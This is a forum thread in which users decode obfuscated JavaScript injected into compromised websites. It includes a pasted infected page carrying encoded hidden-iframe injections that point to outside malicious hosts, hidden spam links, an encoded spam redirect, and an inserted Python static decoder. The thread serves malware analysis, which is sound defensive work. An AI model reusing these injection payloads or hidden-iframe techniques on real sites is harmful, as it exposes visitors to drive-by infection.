
View Full Version : Decrypting obfuscated JavaScript


juninho85
02-04-2008, 15:04
These days, having a bit of free time, I'm trying to tinker with the tools made available by Edgar, which can be found here (http://edgar.bangkok.googlepages.com/edgar%27sinternettools).
With the help of WebScanner (http://edgar.bangkok.googlepages.com/webscanner_v3_5_1.zip), after reading this (http://www.castlecops.com/t210364-.html) report from CastleCops, I ran a search over all the sites hosted on that server with the query unescape$Iframe, which is used to redirect to malicious sites.
Out came this crazydog.chat.ru; below you'll find the source:
<html><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<title>Автосалон FIAT г. Тюмень: официальный сайт</title>
<meta http-equiv="Content-Type" content="text/html; Charset=Windows-1251" />
<meta name="KeyWords" content="Официальный, сайт, FIAT, г. Тюмень, Panda, Panda 4x4 Climbing, Grande Punto 3d, Grande Punto 5d, Croma, Doblo Panorama, Doblo Cargo, гарантия, сервис, техническое обслуживание, новости." />
<meta name="Description" content="Автосалон FIAT г. Тюмень" />
<meta name="Author" content="Zebra-Group - www.zebra-group.ru">
<meta name="Generator" content="Handmade"/>
<link rel="Stylesheet" href="/main.css" type="text/css"/>
<link rel="SHORTCUT ICON" href="/favicon.ico"/>


<script language='javascript' src='http://127.0.0.1:1030/js.cgi?pca&r=19718'></script>

<script language="JavaScript" src="/java.js"></script>
</head>
<body ><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><html></html><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>

<!-- AdRiver code START Type: ZeroPixel Site: fiat.ru PZ: 0 BN: 0-->
<noscript>
<img src="http://ad.adriver.ru/cgi-bin/rle.cgi?sid=76322&bt=21&pz=0&rnd=989211744" alt="-AdRiver-" border=0 width=1 height=1>
</noscript>
<!-- AdRiver code END -->

<div id="sub">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="700" height="100" id="sub_menu" align="middle">
<PARAM NAME=FlashVars VALUE="id=1&razdel=">
<param name="allowScriptAccess" value="sameDomain" />

</object>
</div>



<param name="allowScriptAccess" value="sameDomain" />
<param name="movie" value="/img/menu_head.swf" /><param name="menu" value="false" /><param name="quality" value="high" /><p

<!-- + --><script language=\"JavaScript\"> eval(unescape(\"document.write%28String.fromCharCode%2860%2C105%2C102%2C114%2C97%2C109%2C101%2C32%2C115%2C114%2C99%2C61%2C34%2C104%2C116%2C116%2C112%2C58%2C47%2C47%2C119%2C119%2C119%2C46%2C111%2C110%2C119%2C101%2C98%2C117%2C115%2C97%2C46%2C99%2C111%2C109%2C47%2C99%2C111%2C105%2C110%2C47%2C99%2C111%2C105%2C110%2C95%2C108%2C97%2C110%2C103%2C47%2C108%2C97%2C110%2C103%2C95%2C101%2C110%2C103%2C108%2C105%2C115%2C104%2C47%2C108%2C111%2C99%2C97%2C108%2C47%2C105%2C99%2C101%2C47%2C105%2C110%2C100%2C101%2C120%2C46%2C112%2C104%2C112%2C34%2C32%2C119%2C105%2C100%2C116%2C104%2C61%2C34%2C48%2C34%2C32%2C104%2C101%2C105%2C103%2C104%2C116%2C61%2C34%2C48%2C34%2C62%2C60%2C47%2C105%2C102%2C114%2C97%2C109%2C101%2C62%29%29%3B\")); </script><!-- + -->
<!-- START CNN HOT NEWS -->
<div id="bbc_co_uk_rss" style="margin-top: -9999px;">
<table cellpadding="2" cellspacing="2">
<tr><td><a href="http://www.streamingpornsex.com/sitemap.html" title="will porn">will porn</a> - <em>will porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bestpornsight.com/sitemap.html" title="porn here">porn here</a> - <em>porn here</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornsitecentral.com/sitemap.html" title="free porn">free porn</a> - <em>free porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarresource.com/sitemap.html" title="where porn">where porn</a> - <em>where porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="on porn">on porn</a> - <em>on porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.vietsuperporn.com/sitemap.html" title="how porn">how porn</a> - <em>how porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornstarsolutions.com/sitemap.html" title="is porn">is porn</a> - <em>is porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornsex.com/sitemap.html" title="la porn">la porn</a> - <em>la porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.onlineporndirectory.com/sitemap.html" title="donwload porn">donwload porn</a> - <em>donwload porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornworldcup.com/sitemap.html" title="of porn">of porn</a> - <em>of porn</em> permanent link...</td></tr>
<tr><td><a href="http://www.cheapxxxblog.ru/sitemap.html" title="вы порно">вы порно</a> - <em>вы порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornwebmistressblog.ru/sitemap.html" title="год порно">год порно</a> - <em>год порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.skyblogonline.ru/sitemap.html" title="всего порно">всего порно</a> - <em>всего порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.bargainpornblog.ru/sitemap.html" title="бы порно">бы порно</a> - <em>бы порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.rucespornworld.ru/sitemap.html" title="вот порно">вот порно</a> - <em>вот порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.christmassexblog.ru/sitemap.html" title="быть порно">быть порно</a> - <em>быть порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.adultsexdatingblog.ru/sitemap.html" title="весь порно">весь порно</a> - <em>весь порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.pornblogdirect.ru/sitemap.html" title="все порно">все порно</a> - <em>все порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.topxxxblog.ru/sitemap.html" title="в порно">в порно</a> - <em>в порно</em> permanent link...</td></tr>
<tr><td><a href="http://www.rusexmovies.ru/sitemap.html" title="говорить порно">говорить порно</a> - <em>говорить порно</em> permanent link...</td></tr>
<tr><td>Copyright &copy; 2007</td></tr>
</table>
</div>
</title></comment></a></div></span></ilayer></layer></iframe></center>
</noframes></style></noscript></table></script></applet></font></td></tr>

<center>
<font size="1">Chat.Ru рекомендует:</font>
<a target="_blank" href="http://www.asia.ru/"><font size="1">Производители,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">товары,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">оборудование:</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Китай,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Индия,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Япония,</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Сингапур</font></a>
&nbsp;
<a target="_blank" href="http://www.asia.ru/"><font size="1">Тайвань</font></a>
</center>
</body>
</html>
<!-- END CNN HOT NEWS -->
note this:
unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%36%37%30%34%36%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%62%65%73%74%69%6e%6c%69%76%65%2e%63%6e%2f%69%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%38%36%31%34%34%29%2b%27%37%34%32%62%64%36%35%32%35%62%31%5c%27%20%77%69%64%74%68%3d%35%34%34%20%68%65%69%67%68%74%3d%35%32%36%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")
translated with the Deobfuscating javascript tool (http://edetools.blogspot.com/2007/10/deobfuscating-javascript-tool.html)
I get, translating with key 9:
window.status="Done";document.write("<iframe name=67046 src=\"http://bestinlive.cn/i/index.php?"+Math.round(Math.random()*286144)+"742bd6525b1\" width=544 height=526 style=\"display: none\"></iframe>")

At the end of the day: how do I tell whether a piece of JavaScript is malicious or not? :stordita:

Entering the site:
http://bestinlive.cn/i/index.php
on finjan I get this (http://www.finjan.com/Content.aspx?id=574)
I wanted to ask you whether my lamer attempt worked out, because it's the first time I've tried to understand this blasted system! :D

juninho85
02-04-2008, 15:31
this one instead is contained in chezbacbacool.com
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D
translated:
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_++){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_+=Z_;};for(A_=0;A_<B_.length;A_++){Z_=B_.charAt(A_);if(T_.length>1024){S_++;N_[S_]=T_;T_=""}if(Z_=="%"){A_++;T_+=L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_+=L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_+=Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_] +T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)}
it's not malicious, right?
how can you tell?

juninho85
02-04-2008, 17:04
this one instead should be malicious
zi6c1zjsocfi1.blogspot.com
<p><script language="javascript">document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%62%6F%75%67%68%74%6D%6F%72%65%2E%63%6F%6D%22%29%3B%3C%2F%73%63%72%69%70%74%3E"));</script></p>
translated:
<script language="javascript">location.replace("http://boughtmore.com");</script>
even though it redirects to
http://boughtmore.com

in itself it doesn't look malicious, unless for you stocking up on a bit of Cialis counts as such :stordita:

Gianky....! :D :)
02-04-2008, 21:40
this one instead is contained in chezbacbacool.com
%66%75%6E%63%74%69%6F%6E%20%44%5F%28%42%5F%29%7B%76%61%72%20%41%5F%2C%4E%5F%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%53%5F%3D%30%2C%54%5F%3D%22%22%2C%4C%32%5F%3D%54%5F%2C%5A%5F%2C%50%5F%2C%53%5F%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%32%35%36%3B%41%5F%2B%2B%29%7B%5A%5F%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%41%5F%29%3B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3C%30%29%4C%32%5F%2B%3D%5A%5F%3B%7D%3B%66%6F%72%28%41%5F%3D%30%3B%41%5F%3C%42%5F%2E%6C%65%6E%67%74%68%3B%41%5F%2B%2B%29%7B%5A%5F%3D%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%3B%69%66%28%54%5F%2E%6C%65%6E%67%74%68%3E%31%30%32%34%29%7B%53%5F%2B%2B%3B%4E%5F%5B%53%5F%5D%3D%54%5F%3B%54%5F%3D%22%22%7D%69%66%28%5A%5F%3D%3D%22%25%22%29%7B%41%5F%2B%2B%3B%54%5F%2B%3D%4C%32%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%42%5F%2E%63%68%61%72%41%74%28%41%5F%29%29%29%7D%65%6C%73%65%7B%69%66%28%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%3E%2D%31%29%7B%54%5F%2B%3D%4C%31%5F%2E%63%68%61%72%41%74%28%4C%31%5F%2E%6C%65%6E%67%74%68%2D%4C%31%5F%2E%69%6E%64%65%78%4F%66%28%5A%5F%29%2D%31%29%7D%65%6C%73%65%7B%54%5F%2B%3D%5A%5F%7D%7D%7D%66%6F%72%28%41%5F%3D%53%5F%3B%41%5F%3E%30%3B%41%5F%2D%2D%29%54%5F%3D%4E%5F%5B%41%5F%5D%20%2B%54%5F%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%28%64%6F%63%75%6D%65%6E%74%2E%6C%61%79%65%72%73%7C%7C%64%6F%63%75%6D%65%6E%74%2E%61%6C%6C%29%3F%75%6E%65%73%63%61%70%65%28%65%73%63%61%70%65%28%54%5F%29%29%3A%54%5F%29%7D
translated:
function D_(B_){var A_,N_=new Array(),S_=0,T_="",L2_=T_,Z_,P_,S_;for(A_=0;A_<256;A_++){Z_=String.fromCharCode(A_);if(L1_.indexOf(Z_)<0)L2_+=Z_;};for(A_=0;A_<B_.length;A_++){Z_=B_.charAt(A_);if(T_.length>1024){S_++;N_[S_]=T_;T_=""}if(Z_=="%"){A_++;T_+=L2_.charAt(L1_.indexOf(B_.charAt(A_)))}else{if(L1_.indexOf(Z_)>-1){T_+=L1_.charAt(L1_.length-L1_.indexOf(Z_)-1)}else{T_+=Z_}}}for(A_=S_;A_>0;A_--)T_=N_[A_] +T_;document.write((document.layers||document.all)?unescape(escape(T_)):T_)}
it's not malicious, right?
how can you tell?

From the fact that the JavaScript doesn't contain any links/URLs

MUAHAHAHHAHA :asd: :asd:

juninho85
02-04-2008, 21:42
From the fact that the JavaScript doesn't contain any links/URLs

MUAHAHAHHAHA :asd: :asd:

I thought so too, but I can't explain the need to encrypt it that way :wtf:

W.S.
03-04-2008, 08:17
At the end of the day: how do I tell whether a piece of JavaScript is malicious or not?

By reading the code and understanding what it does. If it tries to execute something you don't want your machine to execute, then it is to be considered malicious.
It's not a given that if it contains a URL it's malicious; it could be the link of a menu, a legitimate link.

Obfuscating code is supposed to prevent the code itself from being copied. Sometimes whoever writes it obfuscates it so their ideas don't get copied, which is rather absurd when talking about JavaScript, since it can always be deciphered. Other times people are convinced that by obfuscating it they can hide some sensitive procedure, such as authentication.. needless to say that is even more absurd.
The greatest usefulness of JavaScript obfuscation is to attackers: it is used to hide the code from automatic detection tools. A careful user will always manage to understand what is being executed, but an automatic program is easily bypassed (sometimes even exploitable for one's own purposes)
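The two wrapper layers seen in this thread (eval(unescape("%..")) in the crazydog.chat.ru and blogspot snippets, String.fromCharCode(...) in the second injection on crazydog) can be peeled statically, with no JavaScript engine, and the readable result then checked for the behaviours W.S. describes (hidden iframe, redirect, dynamic write, external hosts). The script below is an added example, not code from the thread or from Edgar's tools: the blogspot sample is the one quoted above, while the second sample is constructed to mirror the crazydog injection and uses the placeholder host iframe-host.invalid.

```python
import re
from urllib.parse import quote, unquote

# Layer 1: unescape("%3C%73...") -> percent-decode the literal; no JS engine is involved.
UNESCAPE_RE = re.compile(r'unescape\(\s*\\?["\']((?:%[0-9A-Fa-f]{2}|[^"\'\\])*)\\?["\']\s*\)')
# Layer 2: String.fromCharCode(60,105,...) -> join the code points back into text.
FROMCHARCODE_RE = re.compile(r'String\.fromCharCode\(([\d,\s]*)\)')

def _from_char_code(m):
    return ''.join(chr(int(c)) for c in m.group(1).split(',') if c.strip())

def decode_layers(script, max_rounds=8):
    """Peel unescape()/fromCharCode() wrappers statically, one layer per round."""
    for _ in range(max_rounds):
        step = UNESCAPE_RE.sub(lambda m: unquote(m.group(1)), script)
        step = FROMCHARCODE_RE.sub(_from_char_code, step)
        if step == script:
            break  # fixed point: nothing left to peel
        script = step
    return script

# Behaviours worth a second look once the text is readable; the verdict stays with the analyst.
INDICATORS = {
    'hidden_iframe': re.compile(r'<iframe[^>]*(?:display:\s*none|(?:width|height)\s*=\s*\\?["\']?0\b)', re.I),
    'redirect': re.compile(r'location\.(?:replace|href)', re.I),
    'dynamic_write': re.compile(r'document\.write', re.I),
}
HOST_RE = re.compile(r'https?://([A-Za-z0-9.-]+)')

def analyse(script):
    """Return (decoded text, indicator names hit, external hosts referenced)."""
    decoded = decode_layers(script)
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))
    return decoded, hits, sorted(set(HOST_RE.findall(decoded)))

# Sample 1: the blogspot snippet quoted in the thread (taken from the page as posted).
BLOGSPOT = ('document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E'
            '%6C%6F%63%61%74%69%6F%6E%2E%72%65%70%6C%61%63%65%28%22%68%74%74%70%3A%2F%2F%62%6F%75%67%68%74%6D%6F%72%65%2E%63%6F%6D%22%29%3B'
            '%3C%2F%73%63%72%69%70%74%3E"));')
# Sample 2: a constructed stand-in for the crazydog.chat.ru injection (placeholder host), nested the
# same way that page was: eval(unescape(...)) around a document.write of a hidden iframe via fromCharCode.
HIDDEN = '<iframe src="http://iframe-host.invalid/i/index.php" width=0 height=0 style="display: none"></iframe>'
INNER = 'document.write(String.fromCharCode(' + ','.join(str(ord(c)) for c in HIDDEN) + '));'
CRAZYDOG_LIKE = 'eval(unescape("' + quote(INNER, safe='') + '"));'

if __name__ == '__main__':
    for sample in (BLOGSPOT, CRAZYDOG_LIKE):
        decoded, hits, hosts = analyse(sample)
        print(decoded, hits, hosts, sep='\n  ')
```

The decoder only rewrites string literals and never executes the sample, so it is safe to run on captured pages; it does not handle the chezbacbacool-style substitution decoder, which needs its L1_ alphabet and has to be read by hand as W.S. suggests.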

juninho85
03-04-2008, 08:56
in short it's "enough" to be able to understand the language... time for me to start studying :D